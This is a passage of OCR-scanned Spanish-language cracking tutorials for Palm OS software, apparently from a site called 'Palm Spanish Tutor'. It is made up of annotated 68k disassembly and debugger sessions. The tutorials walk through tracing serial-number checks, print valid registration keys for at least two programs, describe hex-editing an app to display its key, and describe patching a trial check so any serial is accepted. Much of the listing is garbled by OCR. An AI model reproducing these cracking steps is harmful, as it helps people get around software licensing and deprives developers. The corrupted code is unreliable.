loc_3701: 
00003701 
00003703 
00003705 
00003707 


54 4F 
60 16 


3F 3C 


Alert 


4E 4F 
54 4F 
60 OA 


3F 3C 


Alert 


4E 4F 
54 4F 


60 44 


52 8B 
52 8A 
52 43 
0C 43 
6D BA 
1B 7C 
FB 88 
30 2D 
67 OA 
53 40 
67 12 
53 40 
67 1A 
60 22 


3F 3C 


X-ref 


60 16 


Alert 


4C DF 
0Cc 08 
4E 5E 
4E 75 


ADD.W +$$2, A7 
BRA.S LOC_36BB 


27 3F MOVE.W +$$273F, -(A7) 
(Enregistrement) 


Al 92 SysTrap FrmAlert 
ADD.W +4$2, A7 
BRA.S LOC_36BB 


27 58 MOVE.W 152758, -(A7) 
(Registration) 


Al 92 SysTrap FrmAlert 
ADD.W $2, A7 


BRA.S LOC_3701 


ADD.L +$1, A3 
ADD.L +$$1, A2 
A 
0 


DD.W +$1, D3 

O 10 CMP.W +$0010, D3 
BLT.S LOC_3683 

00 01 MOVE.B +$7C, $1(A5) 
DC.W +FB88 

FB 96 MOVE.W VAR_46A, DO 


BEQ.S LOC_36DF 
SUB.W +$1, DO 
BEQ.S LOC_36EB 
SUB.W +$1, DO 
BEQ.S LOC_36F”7 
BRA.S LOC_3701 


27 27 MOVE.W +4$2727, -(A7) 
to Alert (Registration) 


Al 92 SysTrap FrmAlert 
ADD.W $2, A7 
BRA.S LOC_3701 


27 40 MOVE.W +$2740, -(A7) 
(Enregistrement) 


Al 92 SysTrap FrmAlert 
ADD.W $2, A7 
BRA.S LOC_3701 


27 59 MOVE.W 152759, -(A7) 
(Registration) 


Al 92 SysTrap FrmAlert 
ADD.W +4$2, A7 


CMP.B +58, AO 
UNLK.L A6 
RTS 


=-- FUNCTION sd(struct) 


¿ local struct sVar_06 = -$6(a6) 


Parching File 


00003649 48 6E 
0000364D 4E 4F 
00003651 48 6D FB AO PEA.L VAR_460 
00003655 48 6E FF FA PEA.L SVAR_06 


FF F6 P 
A Ss 
F y 
F Pp 
00003659 4E 4F AO C5 SysTrap StrCopy 
F P 
F P 
A Ss 
A + 


0 C5 


EA.L LVAR_0A 


ysTrap StrCopy 


0000365D 48 6E FF E6 PEA.L SVAR_1A 
00003661 48 6E FF F6 PEA.L LVAR_0A 
00003665 4E 4F AO C7 SysTrap StrlLen 
00003669 58 4F ADD.W +54, A7 

0000366B 3F 00 MOVE.W DO, -(A7) 

0000366D 48 6É FF F6 PEA.L LVAR_0A 
00003671 4E 4F A2 F1 SysTrap EncDigestMD5 
00003675 76 00 MOVE.L +$0, D3 

00003677 47 ED FE OA LEA.L VAR_1F6, A3 
0000367B 45 EE FF E6 LEA.L SVAR_1A, A2 
0000367F 4F EF 00 1A LEA.L $1A(A7), A7 
loc_3683: 


00003683 10 12 MOVE.B (A2), DO 
00003685 B0 13 CMP.B (A3), DO 


: <--- Aqui hacer que valide cualquier fake serial 
00003689 30 2D FB 96 MOVE.W VAR_46A, DO 

0000368D 67 0A BEQ.S LOC_3699 

0000368F 53 40 SUB.W +$1, DO 
00003691 67 12 BEQ.S LOC_36A5 
00003693 53 40 SUB.W +$1, DO 
S 
S 


00003695 67 1A BEQ.S LOC_36B1 

00003697 60 22 BRA.S LOC_36BB 

loc_3699: 

00003699 3F 3C 27 26 MOVE.W +$$2726, -(A7) 


X-ref to Alert (Registration) 


0000369D 4E 4F Al 92 SysTrap FrmAlert 
000036A1 54 4F ADD.W +52, A7 

000036A3 60 16 BRA.S LOC_36BB 

loc_36A5: 

000036A5 3F 3C 27 3F MOVE.W +$5273F, -(A7) 


X-ref to Alert (Enregistrement) 


000036A9 4E 4F Al 92 SysTrap FrmAlert 
000036AD 54 4F ADD.W +52, A7 

000036AF 60 0OA BRA.S LOC_36BB 

loc_36B1: 

000036B1 3F 3C 27 58 MOVE.W 152758, -(A7) 


X-ref to Alert (Registration) 


000036B5 4E 4F Al 92 SysTrap FrmAlert 
000036B9 54 4F ADD.W $52, A7 

loc_36BB: 

000036BB 60 44 BRA.S LOC_3701 

loc_36BD: 

000036BD 52 8B ADD.L +51, A3 

000036BF 52 8A ADD.L +$$1, A2 

000036C1 52 43 ADD.W +51, D3 

000036C3 0C 43 00 10 CMP.W +$0010, D3 
000036C7 6D BA BLT.S LOC_3683 

000036C9 1B 7C 00 01 MOVE.B +$5$7C, $1(A5) 
000036CD FB 88 DC.W +FB88 

000036CF 30 2D FB 96 MOVE.W VAR_46A, DO 
000036D3 67 0A BEQ.S LOC_36DF 

000036D5 53 40 SUB.W +$1, DO 

000036D7 67 12 BEQ.S LOC_36EB 


000036D9 
000036DB 
000036DD 


loc_36DF': 


000036DF 
loc_36DF 


000036E3 
000036E”7 
000036E9 


loc_36EB: 


000036EB 


X-ref to 


000036EF 
000036F3 
000036F5 


loc_36F7: 


000036F”7 


X-ref to 


000036FB 
000036FF 


loc_3701: 


00003701 
00003703 
00003705 
00003707 


Comentarios en: 


Palm Spanish Tutor: 


53 40 
67 1A 
60 22 


3F 3cC 


X-ref 


4E 4F 
54 4F 
60 16 


3F 3C 


Alert 


4E 4F 
54 4F 
60 OA 


3Fr 3cC 


Alert 


4E 4F 
54 4F 


4C DF 
0c 08 
4E 5E 
4E 75 


SUB.W +$1, DO 
BEQ.S LOC_36F”7 
BRA.S LOC_3701 


27 27 MOVE.W +4$2727, -(A7) 
to Alert (Registration) 


Al 92 SysTrap FrmAlert 
ADD.W +4$2, A7 
BRA.S LOC_3701 


27 40 MOVE.W 152740, -(A7) 
(Enregistrement) 


Al 92 SysTrap FrmAlert 
ADD.W +$$2, A7 
BRA.S LOC_3701 


27 59 MOVE.W 1452759, -(A7) 
(Registration) 


Al 92 SysTrap FrmAlert 
ADD.W +$$2, A7 


CMP.B +58, AO 
UNLK.L A6 
RTS 
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sobre Ingeniería 


Palm Spanish Tutor 


(OSerial ()HotSync/ Code ()Trial ()Multiprotección ( )Encriptado ( )Otro 


(X)NewBies ( )Intermedio ()Avanzado ()Master ( )Gúru 
http://www. palmgear. com 


INTRODUCCION 


Desensamblar con PalmDemon 0.27, Con el debugger analizaremos paso a paso, para ello deberemos de 
poner un breakpoint en la API atb "FldGetTextPtr" en este caso usando el Palmdebugger, cabe hacer 
la aclaración de que si estando en el debugger observáramos que tiene cada registro (DO .... D7 ) y que tiene 
cada bandera (AO......A7) , Nunca encontraríamos el serial que buscamos ,esto debido a que en este PRC no 
vemos ninguna comparación del serial completo REAL con el serial completo FALSO (ejemplo CMP.W A7, 
DO) ó un caso similar, Porque este programa compara parte por parte el serial falso contra el verdadero, por 
eso no lo vemos buscando en la memoria, Lo único que nos queda es analizar paso a paso empezando por el 
breakpoint antes mencionado. 


AL ATAQUE 


Registrando con : 12345678 


00004E9E 4E 4F Al 39 SysTrap FldGetTextPtr 

00004EA2 28 08 MOVE.L AO, D4 <-——(Almacenar el serial falso en D4) MOVE.L 000027E6,00000000 
dm a0 

000027E6: 31 32 33 34 35 36 37 38 00 00 00 00 00 0D 00 00 "12345678........ ds 

00004EA4 58 4F ADD.W +$4, A7 <-—-—-A7:0003BA74+4=0003BA78 Ajustes en la pila 0003BA78=244344 
loc_4EA6: 


00004EA6 4A 84 TST.L D4 <--- D4=000027E6 Analiza el serial falso ¿cuantos y que bytes tiene? 

dm d4 

000027E6: 31 32 33 34 35 36 37 38 00 00 00 00 00 0D 00 00 "12345678........ dl 

00004EAB8 67 1A BEQ.S LOC_4EC4 <--—- saltar si esta vacía la casilla de registro 

00004EAA 2F 04 MOVE.L D4, -(A7) <-—-—Pasar Falso serial falso de D4 a la pila en A7 y decremetar 


a 1 para analizar digito por digito 

00004EAC 61 00 2F 5E BSR.W SUBROUTINE_7E24 <-—-—-Entrar a la sub-rutina , Aqui se podria encontrar 
alguna comprobación ó creación del serial, Un BSR siempre ter- 
mina con un RTS y carga el contador a la pila y des 
vuelve el puntero al inicio de la Sub-rutina 
para continuar con 00004EBO 


00004EBO 
00004EB2 
00004EB4 
00004EB6 


00004EB8 
00004EBC 


00004EBE 
00004EC0O 


loc_4EC4: 


00004EC4 


loc_4EC6: 


00004EC6 


00004ECA 


00004ECE 


00004E 
00004E 
00004E 
00004E 


00004EE 
E4 
E6 
E8 


00004E 
00004E 
00004E 


00004EEA 


00004E 
00004E 


00004EF2 
00004EF4 


00004EFE 


00004F 
00004F 
00004F 
00004F 
00004F 
00004F 
00004F 
00004F 
00004F 
00004F 


00 
04 
06 
08 
0c 
10 
14 
16 
1A 
1E 


00004F22 


1 


SubRoutine_7E24: 


4F 
80 
0E 
04 


4F 
00 


4F 
00 


43 


EC 


28 


FC 
40 
EC 
68 
EC 
28 
01 
40 
41 
41 
40 
EC 
80 
28 
3C 
00 
00 
4F 
40 


1 EC 


28 
FC 
40 


1 EC 


28 
FC 
40 


00007E0C 4E 56 00 00 LINK.L A6, +0 
00007E10 22 6E 00 08 MOVE.L $8(A6), Al 
00007E14 20 49 MOVE.L Al, AO 

00007E16 4A 11 TST.B (Al) 

00007E18 67 06 BEQ.S LOC_7E20 
loc_7ElA: 

00007E1A 52 48 ADD.W +*+$1, AO 

00007E1C 4A 10 TST.B (A0) 

00007E1E 66 FA BNE.S LOC_7ElA 


loc_7E20: 
00007E20 20 08 MOVE.L AO, DO 
00007E22 90 89 SUB.L Al, DO 
00007E24 4E 5E UNLK.L A6 
00007E26 4E 75 RTS 


ADD.W +$4, A7 <-—-—-A7=0003BA74+4+4=0003BA78 0003BA78=244344 decimal 
TST.L DO <-—— DO=00000008 comparar si son 8 digitos 
BEQO.S LOC_4EC4 <-—-—- Salta si no hay 8 dígitos introducidos. 
MOVE.L D4, -(A7) <---D4=000027E6 Pasar serial falso a A7 
y decrementa A7,Resulta A7=0003BA74 000027E6=10241 decimal 
AO CE SysTrap StrATolI 
MOVE .W DO, D3 <-—-—-DO0=00BC614E Ahora en DO esta el serial falso 
Mover el serial introducido "12345678" que esta en DO a D3 
ADD.W +$$4, A7 <-—-—-A7=0003BA74+4=0003BA78 0003BA78=244344 decimal 


00 04 BRA LOC_4EC6 <--—-Salto obligatorio 
CLR.W D3 <-—-—-D3=0 Limpia el registro D3 


06 E8 LEA.L $6E8(A4), AO <--— LEA.L $6E8(000049D8), 00000001 ; A0=000050C0 

00 56 MOVE.W $56(A0), DO <-——-MOVE.W $56(000050C0),DO ;DO=00BC0002 

00BCOOO2= 0770 decimal 

03 E8 MULS.W +$0E8, DO <-——DO=D0*1000=00BC0002*03E8=000007D0 '000007D0=2000 dec.| 

SUB.W DO, D3 <-—-—D3=D3-DO 

06 E8 LEA.L $6E8(A4), AO <-—-—-A0=A4+1768 

00 50 SUB.W $50(A0), D3  <--—-D3=(A0+50)-D3 Óó D3=(A4+1768)-D3 

06 E8 LEA.L $6E8(A4), AO <-—-—-A0=A4+1768=000049D8+06E8=000050C0 000050C0=20672 dec 

00 52 MOVE.W $52(A0), D1 <-—-—D1=A0+52=(000050C0+52)=00000001 

MOVE .W D1, DO <--—DO=D1=00000001 

ASL.W +$3, DO <-—-—-DO0O=00000008 Pasar a la izquierda los bits de DO 

ADD.W D1, DO <---—DO=D0+D1=00000008+00000001=00000009 

ADD.W D1, DO <-——DO=D0+D1=00000009+00000001=0000000A E 

SUB.W DO, D3 <-——D3=D0-D3=0000000A-0000597D=00005973 EE 

06 E8 LEA.L $6E8 (A4),<--—- A0=A4+1768=000049D8+6E8=000050C0 DOUE OO zO Sta decimal] 

CLR.L DO <--—- DO=00000000 

00 58 MOVE.W $58(A0), DO <--—DO=A0+88 

00 04 93.. MOVE.L +$000493E0, -(A7) <--- [493E0=300000 1 decrementa A7 en 1 

MOVE.L DO, -(A7) <--—-A7=D0=00000001 y A7 es decrementado en 1 

27 OE BSR.W LOC_7610 

ADD.W $$8, A7 <--—-A7=A7+8=0003BA70+8=0003BA78 

SUB.W DO, D3 <-——D3=D0-D3=000493E0-00005973=0000C593 0000C593=50579 dec 

06 E8 LEA.L $6E8(A4), AO <--—-A0=A4+1768=000050C0 000050C0=20672 dec 

00 54 MOVE.W $54(A0), DO <--— DO=A0+54=00040003 00040003=26214'7 dec] 

00 64 MULS.W +$0064, DO <-——DO=D0*100=0000012C 00000 elo 

SUB.W DO, D3 <--— D3=D0-D3=0000012C-0000C593=0000C467 0000C467=502'79 dec 

06 E8 LEA.L $6E8(A4), AO <-—-—-A0=A44+1768 ; A4=000049D8 A0=000050C0 

00 4E MOVE.W $4E(A0), DO <-—-—-DO=A0+78 ; AO0=000050C0 ; DO=00000000 

27 10 MULS.W +$2710, DO <---DO=D0*10000=00000000 

SUB.W DO, D3 <---—D3=D0-D3 ;D3=00000000-D3=00000000-0000C467=0000C467 
0000 O 0 9 


00004F24 41 EC 06 E8 LEA.L $6E8(A4), AO <--——A0=A4+1768=000050C0 000050C0=206 

00004F28 42 82 CLR.L D2 <--—-D2=00000000 

00004F2A 34 28 00 5E MOVE.W $5E(A0), D2 <-—-—D2=D2+(A0+94);A0=000050C0;D2=00000001 

00004F2E 20 02 MOVE.L D2, DO <--—-—D2=D0=00000001 

00004F30 EB 80 ASL.L +55, DO <--- DO=00000020 O 

00004F32 90 82 SUB.L D2, DO <--- DO=D2-D0=00000001-000093E0=0000001E [III 

00004F34 7E 09 MOVE.L +$9, D7 <--—- D7=00000009 

00004F36 EF AO ASL.L D7, DO <-—-—-desplazar a la izquierda bytes D7 y ponlos en DO 

D7: 00000009 D1: 000093E0 Resulta DO=00003E00 00003E00 8 

00004F38 DO 82 ADD.L D2, DO <--—DO=D2+D0=00000001+00003E00=00003E01  JIEXI EE YES 

00004F3A 22 00 MOVE.L DO, D1 <-—-—D1=D0=00003E01 00003E00 8 

00004F3C ED 81 ASL.L +$6, D1 <-—--—-D1=000F8040 desplazar el bite 6 a la izquierda 

y guardarlos en D1 000F8040=10158 

00004F3E 92 80 SUB.L DO, D1 <--—D1=D0-D1=00003E01-000F8040=000F423F 

00004F40 D2 82 ADD.L D2, D1 <--—D1=D2+D1=00000001+000F423F=000F4240 

00004F42 96 41 SUB.W D1, D3 <---—D3=D1-D3=000F4240-0000C467=00008227 

00004F44 41 EC 06 E8 LEA.L $6E8(A4), A0 <-——-Leer A4+1768 y ponerlo en A0, A0=000050C0 

00004F48 30 28 00 60 MOVE.W $60(A0), DO <-——DO=A0+60; A0O=000050C0; DO=00000001 

00004F4C C1 FC 00 64 MULS.W +$0064, DO <--— DO=64*D0=64*00000001=00000064 ¡64=100 dec 

00004F50 96 40 SUB.W DO, D3 <-——D3=D0-D3=00000064-00008227=000081C3 000081C3=33219 dec 

00004F52 41 EC 06 E8 LEA.L $6E8(A4), AO <-——-A4=000049D8; 6E8=1768;A0=000050C0 

00004F56 42 80 CLR.L DO <--——D0=00000000 

00004F58 30 28 00 5A MOVE.W $5A(A0), DO <-——DO=A0+90;A0=000050C0;D0=00000001 

blESES 2F 3C 00 98 96.. MOVE.L +$00989680, -(A7) <-—-—[[EEE decrementa en 1 
MOVE.L 1t$00989680,-(0003BA78) Resulta A7=0003BA74 0003BA74=244340 dec 

00004F62 2F 00 MOVE.L DO, -(A7) <--—-A7=D0 decrementa en 1 A7=0003BA70 MIME ITEEIR ES 

00004F64 61 00 26 AA BSR.W LOC_7610 <-—-—Branch to subrutine (Debugger No salta con falso serial) 

00004F68 50 4F ADD.W +$8, A7 <-—-—ADD.W 1$8,0003BA70 ; A7=0003BA78 [III IVEDLERIUNES 

00004F6A 96 40 SUB.W DO, D3 <-——D3=D0-D3=00989680-000081C3=0000EB43 

00004F6C 41 EC 06 E8 LEA.L $6E8(A4), AO <-——-A0=6E8 (000049D8),A0 ¡A0=000050C0 

00004F70 30 28 00 5C MOVE.W $5C(A0), DO <-—-—-MOVE.W $5C(MOVE.W $5C(A0),DO),DO ¡;DO=00980001 

00958000 996 

00004F74 C1 FC 27 10 MULS.W +$10, DO <-——MULS.W H$2710,00980001 ¡; DO=00002710 

00004F78 96 40 SUB.W DO, D3 <-——SUB.W 00002710, 0000EB43 ; D3=0000C433 [oJoJoJo 0 

00004F7A 06 43 E4 A8 ADD.W +$E4A8, D3 <-—-—DD.W f$E4A8,0000C433 ; D3=0000A8DB 

00004F7E 39 43 06 A8 MOVE.W D3, $6A8(Al) <-—-—MOVE.W 0000A8DB,$6A8(000049D8) ¡; A“=000049D8 


00004F82 66 1C BNE.S LOC_4FAO <--- Salta si no es igual a Debugger si salta con falso serial 
00004F84 29 7C 00 08 AF.. MOVE.L +$0008AFEC, $6E8(A4) <-——Pasar 569324 en el operando derecho 
00004F8C 3F 3C 08 99 MOVE.W 150899, -—(A7) SEED a 01 (0x899 


X-ref to Alert (Registration OK) 


00004F90 4E 4F Al 92 SysTrap FrmAlert 
loc_4F94: 
00004F94 3F 3C 08 35 MOVE.W +$0835, -(A7) 


X-ref to Form (Pocket Scorch) 


00004F98 4E 4F Al 9B SysTrap FrmGotoForm 

00004F9C 60 00 00 OA BRA LOC_4FA8 

loc_4FAO: 

00004FAO 3F 3C 08 9D MOVE.W +4$089D, -(A7) SSA O AER: TT CUASI ATI ETN ET 


X-ref to Alert (Registration FAILED) 


00004FA4 4E 4F Al 92 SysTrap FrmAlert 
loc_4FA8: 

00004FA8 10 3C MOVE.B +$3C, DO 
00004FAA 00 01 OR.B +$1, D1 

loc_4FAC: 

00004FAC 28 46 MOVE.L D6, AZ 

00004FAE 02 40 00 01 AND.W +$0001, DO 
00004FB2 4C EE 

00004FB4 00 F8 DC.W +00F8 


00004FB6 FF EC DC.W +fFFEC 
00004FB8 4E 5E UNLK.L A6 
00004FBA 4E 75 RIS 


PASO II : Registrarse con el serial bueno y analizar el código vivo 
(Key: 11319411). 


Para ello cargamos el emulador y el debugger, esperendo dentro del emulador a dar un click para que 
salte al PalmDebugger, Colocando un atb "FldGetTextPtr" 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


Deb0ut = false 
SymbolsOn = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 

dot address = 00000000 
last address = 00000000 
last count = 00000000 


att 
EXCEPTION ID = $80 
'"TargetCfgRoutines' 
+$00FO 1018871C  *LINK A6,$0000 | 4E56 0000 
atb "FldGetTextPtr" 
A-trap set on 0139 (FldGetTextPtr) 


g 
EXCEPTION ID = $80 


0005E374 *_FldGetTextPtr ¿ $10062760 4E4F A139 
t <--- (Presionar varios enters hasta que nos mande al Emulador 
EXCEPTION ID = $80 
0005E378  *MOVE.L A0,D4 2808 
0005E37A *ADDO.W +504,A7 584F 
0005E37C  *TST.L D4 | 4A84 <--- El serial introducido esta aquí (dm d4 50) 
Will Not Branch 
0005E37E *BEOQ.S *+$001C ¿ 0005E39A 671A 
0005E380 *MOVE.L D4,-(A7) 2F04 
0005E382 *BSR.W *+$2F60 ¿ 000612E2 6100 2F5E 
EXCEPTION ID = $80 
0005E386 *ADDO.W +504,A7 584F 
0005E388 *TST.L DO 4A80 
Will Not Branch 
0005E38A *BEOQ.S *+$0010 ¿ 0005E39A 670E 
0005E38C  *MOVE.L D4,-(A7) 2F04 
0005E38E *_StrATol ¿ $1001C770 4E4F AOCE 
EXCEPTION ID = $80 
0005E392 *MOVE.W DO,D3 3600 
0005E394 *ADDO.W +504,A7 584F 
Will Branch 
0005E396 *BRA.W *+50006 ¿ 0005E39C 6000 0004 
0005E39C *LEA $06E8 (A4) AO 41EC 06E8 
0005E3A0 *MOVE.W $0056(A0),DO 3028 0056 
0005E3A4  *MULS.W SE8,DO C1FC 03E8 
0005E3A8 *SUB.W DO,D3 9640 
0005E3AA *LEA $06E8 (A4) AO 41EC 06E8 


0005E3AE 

0005E3B2 

0005E3B6 

0005E3BA 

0005E3BC 

0005E3BE 

0005E3C0 

0005E3C2 

0005E3C4 

0005E3C8 

0005E3CA 

0005E3CE 

0005E3D4 

0005E3D6 
EXCEPTION ID = $80 
0005E3DA 
0005E3DC 
0005E3DE 
0005E3E2 
0005E3E6 
0O005E3EA 
0005E3EC 
0005E3F0O 
0005E3F4 
0005E3F8 
0005E3FA 
O005E3FE 
0005E400 
0005E404 
0005E406 
0005E408 
0005E40A 
0005E40C 
0005E40E 
0005E41 
0005E41 
0005E41 
0005E41 
0005E41 
0005E41 
0005E41E 
0005E422 
0005E426 
0005E428 
0005E42C 
0005E42E 
0005E432 
0005E438 
0005E43A 
ID = $80 
0005E43E 
0005E440 
0005E442 
0005E446 
0005E44A 
0005E44E 
0005E450 
0005E454 


DOQpNO 


EXCEPTION 


0005E458 
0005E45A 
0005E462 
0005E466 


*SUB.W 
*LEA 
*MOVE .W 
*MOVE .W 
*ASL. 
*ADD. 
*ADD. 
*SUB. 
*LEA 
*CLR.L 
*MOVE .W 
*MOVE.L 
*MOVE .L 
*BSR.W 


332333 


*ADDO .W 
*SUB.W 
*LEA 


*CLR.L 
*MOVE .W 
*MOVE.L 
*MOVE.L 
*BSR.W 


MOVE .W 


ri] 


_FrmAlert 


$0050(A0),D3 
$06E8 (A4),A0 
$0052(A0),D1 
D1,DO 
$+503,D0O 
D1,DO 

D1,DO0O 

DO,D3 

$06E8 (A4),A0 
DO 
$0058(A0),DO 
+$000493E0,-(A7) 
DO, -(A7) 
*+$2710 


$S08,A7 
DO0,D3 

$06E8 (A4),A0 
$0054(A0),DO 
$S64,DO0 
DO0,D3 

$06E8 (A4),A0 
S004E(A0),DO 
$+$10,DO 
DO,D3 

$06E8 (A4),A0 
D2 
SOO5E(A0),D2 
D2,D0 

+S05,DO 

D2,DO0 

$S09,D7 

D7,DO 

D2,DO0 

DO, D1 

$S06,D1 

DO, D1 

D2,D1 

D1,D3 

$06E8 (A4),A0 
$0060(A0),DO 
$S564,DO0 

DO0,D3 
$06E8(A4),A0 

DO 

SO005A(A0),DO 
+$00989680,-(A7) 
DO,-(A7) 

*+$26AC 


$S08,A7 
D0,D3 

$06E8 (A4),A0 
$005C(A0),DO 
$+$10,DO 
DO0,D3 
$4SE4A8,D3 
D3,$06A8(A4) 


*+$5001E 
$+S0O008AFEC, $06E8(A4) 
+$50899,-(A7) 


; O0060AE6 


; O0060AE6 


Will Not Branch 
; 0005E476 
O 0 


, 


9668 
41EC 
3228 
3001 
E740 
DO41 
DO41 
9640 
41EC 
4280 
3028 
2F3C 
2F00 
6100 


504F 
9640 
41EC 
3028 
c1Fc 
9640 
41EC 
3028 
c1FcC 
9640 
41EC 
4282 
3428 
2002 
EB80 
9082 
7E09 
EFAO 
D082 
2200 
ED81 
9280 
D282 
9641 
41EC 
3028 
C1FC 
9640 
41EC 
4280 
3028 
2F3C 
2F00 
6100 


504F 
9640 
41EC 
3028 
C1FC 
9640 
0643 
3943 


661€ 
297C 
3F3C 


0050 
06E8 
0052 


06E8 


0058 
0004 


270E 


06E8 
0054 
0064 


06E8 
004E 
2710 
06E8 


005E 


06E8 
0060 
0064 


06E8 


005A 
0098 


26AA 


06E8 
005€ 
2710 


E4A8 


06A8 


0008 
0899 


93E0 


9680 


AFEC 06E8 


ANALIZANDO LOS OFFETS 


¡00004F5C] 2F 3C 00 98 96.. MOVE.L 1500989680, -(A7) A 7=10000000| 
'00004EF8] 2F 3C 00 04 93.. MOVE.L +5$000493E0, -(A7) <--- A 7=300000 | y decrementa A7 en 1 


Ahora les toca a ustedes de tarea ir rastreando hasta encontrar el 11319411 


Supongo que se tienen que topar con algo como: 
100000000+1000000+300000+10000+9000+400+10+1=11319411 que es el serial Verdadero 
Pero les toca investigar, ¿Qué como sup 1 Número Serial? , de una las páginas de 


keygens, A veces esto ayuda para aprender. 


Bye 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


(X)Serial ( )HotSync/ Code ()Trial ()Multiprotección ( )Encriptado ( )Otro 
Divertido juego de basketball 
Objetivo: | Encontrar el serial 


INTRODUCCION 


Desensamblar con PalmDemon v0.27, Esta aplicación no se puede cargar con el 
Emulator Pose, haci que hice que el debugger se cargara remotamente con una 
Palm Zire 72 real conectada por USB, Encontre que es una aplicación que tiene 
protección anti-emulador. 


AL ATAQUE 

0000A390 4E 4F Al 39 SysTrap FldGetTextPtr 

0000A394 58 4F add.w +$$4, a7 

0000A396 2F 08 move.l a0, - (a7) 

0000A398 4E 4F AO CE SysTrap StrATol 

0000A39C 58 4F add.w +$$4, a7 

0000A39E 28 00 move.l1 d0, d4 

0000A3A0 OC 83 00 00 24.. cmp.l1 +$000024F6, d3 <-—— Compara la primer parte del 
serial (9462) 

0000A3A6 66 1A bne.s $A3C2 <--— Salta a la ventana de error si no es correcto 

0000A3A8 0C 84 00 00 06.. cmp.l1 +$0000063E, d4 <-—— Compara la segunda parte del 
serial (1598) 

0000A3AE 66 12 bne.s $A3C2 <--— Salta a la ventana de error si no es correcto 


0000A3B0 3F 3C 05 14 move.w O 51 4) -(a7) <--- "Registered ...." 


X-ref to Alert (Registration) 


0000A3B4 4E 4F Al 92 SysTrap FrmAlert 
0000A3B8 1B 7C 00 01 move.b +$7C, $1l(a5) 
0000A3BC FB 48 DC.W FFB48 

0000A3BE 54 4F add.w +$2, a7 

0000A3C0 60 0A bra.s $A3CC 


0000A3C2 3F 3C 07 6C move. FSQUEg) (27) 


X-ref to Alert (Error!) 


0000A3C6 4E 4F Al 92 SysTrap FrmAlert 
0000A3CA 54 4F add.w +$2, al 
0000A3CC 70 00 move.1l +$0, d0 


Así que al unir las partes resulta: 
9462-1598 
Nos registramos en el programa y parece que si lo valida, Podremos hacer que este 
programa siempre nos recuerde el serial cada que lo instalemos, abriendo nuestro 
editor hexadecimal y en el formulario de registro donde dice 
"Please enter registration code" 
, Cambiémosla por 
"Su clave comprada es: 9462-1598" 

Recordando que no debemos ni quitar ni aumentar el tamaño del archivo, esto intente 
hacerlo con Constructor for Palm OS de CodeWarrior for palm Os 8 demo y lo único que 
conseguí fue que el programa tuviera fallas , funciono y, recomiendo que se haga con 
un editor hexadecimal. 


Hasta la vista. 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


)Serial (X)HotSync/ Code (X)Trial ) Multiprotección )Encriptado ( )Otro 


X)NewBies ()Intermedio ()Avanzado ( )Master ()Gúru 


INTRODUCCION 


[CityTime| Sydney 12:39 arn [CityTime| Sydney 12:39 ar [CityTime| Sydney 12:40 arn 


Register 


User Name: 
Compaq 
UserCode: 
(Please provide this code to 


CityTime 
611993 Code City 


PilotGearHO when registering.) 


www.codecity.com.au 
43:6F:6D:70:61:71:61 


Expires in 10 days 
Version 1.02 


w London Mew York 


Enter Key: 


MWMoS:40prm  :  MMoé6:40 arm 


Después de expirado los diez días aparece la siguiente nag , y no podemos 
hacer más modificaciones a los horarios por que bloquean los despliegues. 


[City Tire | Anchorage 12:43 arn 


Por lo que hoy nuestro objetivo es validar cualquier serial, haciendo que el serial bueno se compare así 
mismo entrando a la Subrutina donde se comprueba el serial bueno con el falso. 


loc_37A6: 


000037A6 
000037A8 
000037AA 
000037AE 
000037B2 
000037B4 
000037B6 
000037B8 
000037BC 
000037BE 
000037C0 
000037C2 
000037C6 
000037CA 
000037CE 
000037D0 
000037D4 
000037D8 


E7 
00 
EF 
2F 
00 
A7 
A7 
6F 
A7 
A7 
A7 
4F 
6F 
4F 
00 
45 
EF 
18 


MOVE.B DO, 
FF D8 LEA.L -$28(A7), 
00 3C MOVE.W $3C(A7), 
MOVE.L $0, 


CLR.L 
CLR.L 
00 08 
CLR.L 
CLR.L 
CLR.L 
A2 A9 
00 18 
A0 C7 


MOVE .W DO, 
CMP .wW +$0002, 
LEA. Sica, 


00 02 
00 1c 
BGE.S 


D7 


D3 
-(A7) 
-(A7) 


AL ATAQUE 


A7 
D6 


PEA.L $8(A7) 


-(A7) 
-(A7) 
-(A7) 


SysTrap Dl1kGetSyncInfo 
PEA.L $18(A7) 
SysTrap StrlLen 


D5 


LOC_37EA 


000037DA 
000037DE 
000037E0 
000037E4 
000037E8 


Cortamos 


000037C0 
000037C2 
000037C6 
000037CA 
000037CE 
000037D0 
000037D4 
000037D8 
000037DA 
000037DE 
000037E0 
000037E4 
000037E8 


loc_37EA: 


000037EA 
000037EC 


FA 
50 
6F 
4F 
4F 


00 A6 
PEA.L 
00 04 
AO C5 
ADD.W 


LEA.L SAG(PC), 


(A0) 


D5 
A7 


AO 


PEA.L $4(A7) 
SysTrap StrCopy 


+58, A7 


código hasta: 


A7 
4F 
6F 
4F 
00 
45 
EF 
10 
FA 
50 
6F 
4F 
4F 


00 
68 


CLR.L 


-(A7) 


A2 A9 SysTrap DlkGetSyncInfo 
00 18 PEA.L $18(A7) 
AO C7 SysTrap StrLen 


MOVE .W DO, 
CMP .wW +$0002, 
LEAL Slam, 


00 02 
00 1C 
BGE.S 
00 A6 
PEA.L 
00 04 
AO C5 
ADD .W 


MOVE.L +SO0, 


BRA.S 


D5 


LOC_37EA 


LEA.L S$AG(PC), 


(A0) 


D5 
A7 


AO 


PEA.L $4(A7) 
SysTrap StrCopy 


$58, A7 


D4 
LOC_3856 


loc_37EE: 


000037EE 
000037F0 
000037F2 
000037F6 
000037F8 


D7 
00 
30 
00 
04 


LEA.L 


MOVE.L $0, 
40 00 MOVE.B S$S0(A0, 
MOVE.L DO, 
MOVE.L $4, 


AO 
DO 


(A7), 


D2 


-(A7) 


<--—- Salta a la rutina de comparación 


D4.W), DO 


000037FA 4E 4F 03 06 SysTrap 0306 

000037FE 58 4F ADD.W +$4, A7 

00003800 2F 00 MOVE.L DO, -(A7) 

00003802 2F 3C 41 BO 00.. MOVE.L +$41B00000, -(A7) 
00003808 30 43 MOVE.W D3, AO 

00003804 2F 08 MOVE.L AO, -(A7) 

0000380C 74 04 MOVE.L +$4, D2 

